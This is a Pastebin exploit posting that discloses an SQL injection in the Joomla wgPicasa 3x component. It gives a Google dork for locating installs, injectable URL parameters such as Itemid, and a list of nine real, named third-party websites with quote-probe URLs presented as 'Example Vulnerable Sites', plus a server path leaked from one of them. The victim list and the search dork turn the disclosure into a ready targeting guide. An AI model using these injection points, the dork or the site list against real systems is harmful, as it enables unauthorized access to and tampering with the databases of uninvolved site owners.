KingSkrupellos

Joomla wgPicasa Components 3x SQL Injection

Jan 31st, 2019
117
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.91 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla wgPicasa Components 3x SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 01/02/2019
  7. # Vendor Homepage : wgjoomla.com
  8. # Software Download Link : wgjoomla.com/cms/download-files
  9. # Software Information Link : extensions.joomla.org/extension/wgpicasa/
  10. # Software Version : 3x
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_wgpicasa''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ####################################################################
  22.  
  23. # Description about Software :
  24. ***************************
  25. The wgPicasa extension is a very simple and powerful component to show
  26.  
  27. your albums installed at Google Picasa Web Gallery (Google PLUS).
  28.  
  29. No costs for hosting and easy in use.
  30.  
  31. It is installed with the very popular "Light-box Slide Gallery.
  32.  
  33. It is for Joomla 1.5, 2.5 and 3x versions.
  34.  
  35. ####################################################################
  36.  
  37. # Impact :
  38. ***********
  39. Joomla wgPicasa 3x component for Joomla! is
  40.  
  41. prone to an SQL-injection vulnerability because it fails to sufficiently
  42.  
  43. sanitize user-supplied data before using it in an SQL query.
  44.  
  45. A successful exploit may allow an attacker to compromise the application, access
  46.  
  47. or modify data, or exploit latent vulnerabilities in the underlying database.
  48.  
  49. A remote attacker can send a specially crafted request to the vulnerable application
  50.  
  51. and execute arbitrary SQL commands in application`s database.
  52.  
  53. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  54.  
  55. An attacker can exploit this issue using a browser.
  56.  
  57. ####################################################################
  58.  
  59. # SQL Injection Exploit :
  60. **********************
  61.  
  62. /index.php?option=com_wgpicasa&view=wgpicasa&Itemid=[SQL Injection]
  63.  
  64. /index.php?option=com_wgpicasa&view=wgpicasa&Itemid=[SQL Injection]
  65.  
  66. /index.php?option=com_wgpicasa&view=album&album=[ID-NUMBER]&page=[ID-NUMBER]&Itemid=[ID-NUMBER]
  67.  
  68. ####################################################################
  69.  
  70. # Example Vulnerable Sites :
  71. *************************
  72.  
  73. [+] heladiamejia.edu.co/inicio/index.php?option=com_wgpicasa&view=album&album=1&page=1&Itemid=190%27
  74.  
  75. [+] cidadedenaron.eu/index.php?option=com_wgpicasa&view=wgpicasa&Itemid=126%27
  76.  
  77. [+] web.orientacio.cat/index.php?option=com_wgpicasa&view=wgpicasa&Itemid=134%27
  78.  
  79. [+] milonga.paroquiadoestoril.com/milonga/index.php?option=com_wgpicasa&view=wgpicasa&Itemid=124%27
  80.  
  81. [+] prodalfer.com/index.php?option=com_wgpicasa&view=wgpicasa&Itemid=729%27
  82.  
  83. [+] greenbikerg.com/index.php?option=com_wgpicasa&view=album&album=1&page=1%27
  84.  
  85. [+] revistalugardeencuentro.com/webantigua/index.php?option=com_wgpicasa&view=album&album=1&page=1&Itemid=30%27
  86.  
  87. [+] sarkola.info/index.php?option=com_wgpicasa&view=wgpicasa&Itemid=537%27
  88.  
  89. [+] eletfanet.hu/j25/index.php?option=com_wgpicasa&view=album&album=1&page=1&Itemid=796%27
  90.  
  91. ####################################################################
  92.  
  93. # Example SQL Database Error :
  94. ****************************
  95.  
  96. Strict Standards: Declaration of wgpicasaController::display() should be
  97. compatible with JController::display($cachable = false, $urlparams
  98. = false) in /var/www/vhosts/cidadedenaron.eu/httpdocs
  99. /components/com_wgpicasa/controller.php on line 26
  100.  
  101. ####################################################################
  102.  
  103. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  104.  
  105. ####################################################################
Add Comment
Please, Sign In to add comment